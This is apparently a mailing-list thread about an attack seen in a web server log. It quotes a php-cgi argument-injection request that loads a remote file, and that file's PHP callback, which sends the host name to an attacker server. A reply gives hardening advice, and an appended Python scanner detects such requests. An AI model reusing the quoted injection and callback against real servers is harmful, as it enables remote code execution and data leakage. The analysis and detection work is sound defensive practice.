Thierry Douez wrote:
Here is the line:

193.107.17.36 ... "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"

The file ../rf/s.txt contains:

<?php file_get_contents('http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0); ?>

The IP points to the middle of nowhere in Russia.

And finally, I know nothing about PHP.
...
If someone has a more precise answer, I'm still interested :)

I don't have anything more specific on that, but I find it interesting that it appears to have been successful (result code 200).

On most Apache and auth logs you'll find a great many attempts at all sorts of exploits, and most fail simply because the file they're looking for isn't there, or has been adequately protected against such attacks.

As a general rule I try to stay current with all server components (MySQL, PHP, any frameworks like WordPress, Drupal, etc.), and most of the time staying current blocks malicious bots.

That said, security is an ongoing process of cat and mouse, and no matter how frequently system components are updated there's always some new exploit being devised and deployed.

I don't know enough about Python or your system setup to suggest how to prevent that specific attack, but in general if you move your CGI engines outside of the public HTML folder, lock down permissions as tightly as practical, and religiously sanitize inputs you can greatly minimize such risks.

One more thing in favor of LiveCode Server: until LC really takes off we get a minor benefit from "security by obscurity" - that is, it simply isn't worth most attackers' time to target LC because it's seldom used on the Web.

Moreover, the LC engine has historically been immune to buffer overruns, so a wide range of potential exploits that have affected other components are very unlikely to affect LC.

And being a very readable language, it's often easier to maintain good sanitization practices with LC.

--
 Richard Gaskin
 Fourth World
 LiveCode training and consulting: http://www.fourthworld.com
 Webzine for LiveCode developers: http://www.LiveCodeJournal.com
 Follow me on Twitter:  http://twitter.com/FourthWorldSys
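The request quoted at the top of this thread is an attempt at php-cgi argument injection: when a query string begins with "-", a php-cgi binary reached directly by the web server parses it as command-line options, and "-d" sets ini values such as allow_url_include and auto_prepend_file. The following is an added example, not code from the thread or from LiveCode: a small Python scanner that flags such requests in Apache combined-format access logs and notes whether the response was 200. The sample log lines are constructed (the remote host is replaced by the placeholder hosting.example).

```python
import re
from urllib.parse import unquote_plus

# Apache combined log: client IP, ident, user, [timestamp], "request line", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)

# ini directives that, set via "-d", let a remote file be pulled into every request
SUSPICIOUS_OPTS = ("allow_url_include", "auto_prepend_file", "auto_append_file")

# Constructed sample log; the first line mirrors the request quoted in the thread.
SAMPLE_LOG = [
    '193.107.17.36 - - [10/May/2012:12:00:00 +0000] "GET /?-n+-dallow_url_include%3DOn'
    '+-dauto_prepend_file%3Dhttp://hosting.example/rf/s.txt HTTP/1.1" 200 6027 "-" '
    '"Python-urllib/2.6"',
    '198.51.100.7 - - [10/May/2012:12:00:01 +0000] "GET /index.php?page=-about HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/May/2012:12:00:02 +0000] "GET /?-s HTTP/1.1" 404 210 "-" '
    '"curl/7.22"',
]


def check_cgi_arg_injection(line):
    """Return a finding dict if the query string looks like php-cgi options, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m.group("target").partition("?")
    decoded = unquote_plus(query)  # %3D -> '=', '+' -> ' '
    # php-cgi only treats the query as argv when it starts with '-'; a value like
    # "page=-about" is ordinary application input and is not flagged.
    if not decoded.startswith("-"):
        return None
    return {
        "ip": m.group("ip"),
        "path": path,
        "status": m.group("status"),
        "options": [o for o in SUSPICIOUS_OPTS if o in decoded],
        "likely_success": m.group("status") == "200",  # 200 means the server answered, as in the thread
    }


def scan(lines):
    """Scan an iterable of log lines and return the list of findings."""
    return [f for f in (check_cgi_arg_injection(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with likely_success set is the one to investigate first: the host answered the injected request, so the prepended remote file may have run and, as in the quoted s.txt, reported the host name back.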
